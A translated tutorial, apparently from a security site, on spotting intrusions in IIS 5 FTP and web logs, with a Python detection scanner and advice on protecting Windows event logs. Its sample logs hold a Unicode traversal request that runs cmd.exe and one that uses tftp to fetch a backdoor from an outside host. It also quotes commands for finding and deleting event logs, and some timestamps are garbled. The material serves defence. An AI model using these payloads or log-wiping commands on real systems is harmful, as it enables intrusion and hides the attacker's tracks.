Research on the vulnerability of typical intrusion log analysis

Source: Internet
Author: User
Tags: common SQL injection attacks, SQL injection, system log
1. FTP Log Analysis
By default, the FTP and WWW services each generate one log file per day containing all of that day's records, named ex(year)(month)(day). For example, ex040419 is the log generated on April 19, 2004. The file can be opened directly in Notepad. The log of an ordinary intrusion attempt generally looks like this:
#Software: Microsoft Internet Information Services 5.0 (Microsoft IIS 5.0)
#Version: 1.0 (version 1.0)
#Date: 20040419 0315 (date and time the service started)
#Fields: time c-ip cs-method cs-uri-stem sc-status
0315 127.0.0.1 [1]user administator 331 (user "administator" from IP address 127.0.0.1 attempts to log in)
0318 127.0.0.1 [1]pass - 530 (login failed)
032:04 127.0.0.1 [1]user NT 331 (user "NT" from IP address 127.0.0.1 attempts to log in)
032:06 127.0.0.1 [1]pass - 530 (login failed)
032:09 127.0.0.1 [1]user cyz 331 (user "cyz" from IP address 127.0.0.1 attempts to log in)
0322 127.0.0.1 [1]pass - 530 (login failed)
0322 127.0.0.1 [1]user Administrator 331 (user "Administrator" from IP address 127.0.0.1 attempts to log in)
0324 127.0.0.1 [1]pass - 230 (login successful)
0321 127.0.0.1 [1]MKD NT 550 (creating a directory failed)
0325 127.0.0.1 [1]quit - 550 (exits the FTP program)
The log shows that a user at IP address 127.0.0.1 kept trying to log on to the system, changing the user name and password four times before succeeding. The administrator can immediately tell that this IP has made at least one intrusion attempt: the time of the intrusion, the IP address, and the user names probed are all clearly recorded in the log. If the intruder eventually got in with the Administrator user name, consider whether that account's password was stolen, or whether the account is being used by someone else. The next thing to think about is what has happened to the system.
2. WWW Log Analysis
Like the FTP service, the WWW service generates logs, by default one log file per day, in the %systemroot%\system32\LogFiles\W3SVC1 directory. This needs special explanation: the web log is different from the other logs. Its analysis is more detailed and requires a wealth of intrusion and protection knowledge, and enough care; otherwise it is easy to overlook a very simple log entry, and usually such an entry is very important. Since we cannot cover every case in one analysis, here is a simple example:
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 20040419 03:091
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
20040419 03:091 192.168.1.26 192.168.1.37 get /iisstart.asp mozilla/4.0+(compatible;+msie+5.0;+windows+98;+DigExt)
20040419 03:094 192.168.1.26 192.168.1.37 get /pagerror.gif mozilla/4.0+(compatible;+msie+5.0;+windows+98;+DigExt)

From the first data entry we can see that on 2004-04-19 a user with IP address 192.168.1.26 accessed the page iisstart.asp on port 80 of the machine 192.168.1.37, and that the user's browser identified itself as Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt). An experienced administrator can determine the intruder's IP address and the time of the intrusion by combining the security log, the FTP log, and the WWW log.
For the now very common SQL injection attacks, checking the PUT and GET requests in the log lets you roughly determine which page has the problem, and then patch it.
3. Analysis of HTTPD transaction log

A number of vulnerabilities in Microsoft's IIS 5 have been exploited by attackers, such as .ida/.idq, Unicode, WebDAVx3, and some that are not publicly known. We analyze the log to analyze the attacker's behavior. For a system that has not applied the patches, the log records of a successful intrusion look like the following. To make the introduction more vivid, we specifically configured an "old" server with the old vulnerabilities for a demonstration; the others are easy to understand by analogy.

(1) Unicode vulnerability intrusion log record

This is a very classic vulnerability; finding such a server today probably means searching slowly abroad, but because its log entries are the most classic of all, we give it a special demonstration here.

Open the log file of the IIS5 web service; by default it is located under the %systemroot%\system32\LogFiles\ folder. Figure 1 shows a typical log record of an intrusion through the Unicode vulnerability. Normal web access retrieves web data with the GET command via port 80, but here illegal character encoding bypasses the character validation and obtains information that should not be obtainable. Applying the corresponding patch closes this vulnerability. See Figure 1.

Let us match the intrusion against the record. At the time of the intrusion, the directory listing of the target machine was viewed with the following request:

GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200

This access behavior is recorded in the log:

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 200 -

Did you see it? Our log clearly records that the attacker at 192.168.0.1 viewed our directory listing. The following line is the log record of a backdoor program being transferred to our machine:

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20get%20cool.dll%20c:\httpodbc.dll
502 -

Did you see that? The record is very detailed: the program run on the system is recorded along with the response, which makes analyzing the intrusion straightforward.

(2) WebDavx3 remote overflow log record

The WebDAVx3 vulnerability, known for some time, is the most widely exploited. If the system suffers this remote overflow, the log record looks like Figure 2:

2004-04-19 07:20:13 192.168.0.218-192.168.0.218 LOCK
/aaaaa ...

This means our web service was attacked from 192.168.0.218 with a LOCK request that locked up (that is, shut down) the web service, and the garbled characters that follow are the offset-guessing process used in the overflow attack.

Each of the examples above logged the IP address of an intrusion, but that IP may be a springboard used by the attacker; that is, it is likely a compromised host (a "chicken" in the slang) rather than the attacker's own address. In that case, look at the other log files: it may be possible to trace the attacker's location, but that depends entirely on the administrator's experience.
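As an added example (not code from the original article), the following Python scanner applies the two checks discussed above to IIS W3C log text: the FTP "several failed PASS attempts, then a successful login from the same IP" pattern from section 1, and the encoded-traversal/cmd.exe and oversized WebDAV request patterns from this section. The log text, the standard W3C field names, and the thresholds are assumptions constructed for the demo.

```python
# Added example (not the article's own code): the sample log text is constructed for the demo.
import re
FTP_LOG = """#Fields: time c-ip cs-method cs-uri-stem sc-status
03:15:20 127.0.0.1 [1]USER administator 331
03:18:01 127.0.0.1 [1]PASS - 530
03:20:04 127.0.0.1 [1]USER nt 331
03:20:06 127.0.0.1 [1]PASS - 530
03:22:09 127.0.0.1 [1]USER Administrator 331
03:24:00 127.0.0.1 [1]PASS - 230
"""
WEB_LOG = "\n".join([
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2004-04-19 03:09:01 192.168.1.26 GET /iisstart.asp - 200",
    "2004-04-19 08:47:47 192.168.0.1 GET /_vti_bin/..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200",
    "2004-04-19 07:20:13 192.168.0.218 LOCK /" + "a" * 2000 + " - 500",  # oversized WebDAV request
])

def parse_w3c(text):
    # Turn a W3C extended log into a list of dicts keyed by the names in the #Fields line.
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def ftp_guess_then_success(rows, min_failures=2):
    """Flag an IP that logs in (230) after at least min_failures failed PASS attempts (530)."""
    fail, user, hits = {}, {}, []
    for r in rows:
        ip, st = r["c-ip"], r["sc-status"]
        method = re.sub(r"^\[\d+\]", "", r["cs-method"]).upper()  # strip the [n] session prefix
        if method == "USER":
            user[ip] = r["cs-uri-stem"]  # remember the last user name tried from this IP
        elif method == "PASS" and st == "530":
            fail[ip] = fail.get(ip, 0) + 1
        elif method == "PASS" and st == "230" and fail.get(ip, 0) >= min_failures:
            hits.append((ip, fail.get(ip, 0), user.get(ip), r["time"]))
    return hits

TRAVERSAL = re.compile(r"\.\.%5c|\.\.%2f|%c0%af|/cmd\.exe", re.I)  # encoded traversal / shell
def web_suspicious(rows, max_uri=1024):
    # Flag encoded-traversal or cmd.exe requests, and WebDAV requests with an oversized URI.
    hits = []
    for r in rows:
        uri, method = r["cs-uri-stem"], r["cs-method"].upper()
        if TRAVERSAL.search(uri):
            hits.append((r["c-ip"], "traversal/cmd.exe", r["sc-status"]))
        elif method in ("LOCK", "SEARCH", "PROPFIND") and len(uri) > max_uri:
            hits.append((r["c-ip"], "oversized WebDAV request", r["sc-status"]))
    return hits
```

Run ftp_guess_then_success(parse_w3c(FTP_LOG)) and web_suspicious(parse_w3c(WEB_LOG)) to see the flagged entries; the benign iisstart.asp request is not reported.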

4. Relocating Log Files for Protection

With the methods above you should be able to detect common system attacks. But then again, if any one of the attacks above succeeds, none of us may get to see the log at all, because the intruder has already cleared it. So, as a precaution against the common ways of deleting logs, we move the log.

Many articles say that relocating the event log protects the system well. Relocation is indeed a protective measure, but as long as someone types dir c:\*.evt /s at the command line, the event log location can be found and the files can then easily be deleted. So what do we do? Log relocation is done by modifying the registry: find the Application, Security, and System subkeys under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog, corresponding to the application log, security log, and system log respectively. How do we modify them? Look at the Application subkey: the File value is the location where the application log file is stored. Change its value to the folder where you want the log file stored, copy the AppEvent.Evt file from %systemroot%\system32\config\ to that folder, and restart the machine.

The purpose of relocating is to take advantage of the Security properties of NTFS on Windows 2000: without relocating, the files' security cannot be set safely. Right-click the relocated folder, choose Properties, go to the Security tab, and uncheck "Allow inheritable permissions from parent to propagate to this object". Add the SYSTEM group, give the Everyone group read permission, and for the SYSTEM group select all permissions except Full Control and Modify. Then change the system's default log file size of 512KB to the size you want, such as 20MB. With these settings, running del c:\*.evt /s /q directly does not delete the logs, which is relatively much safer.
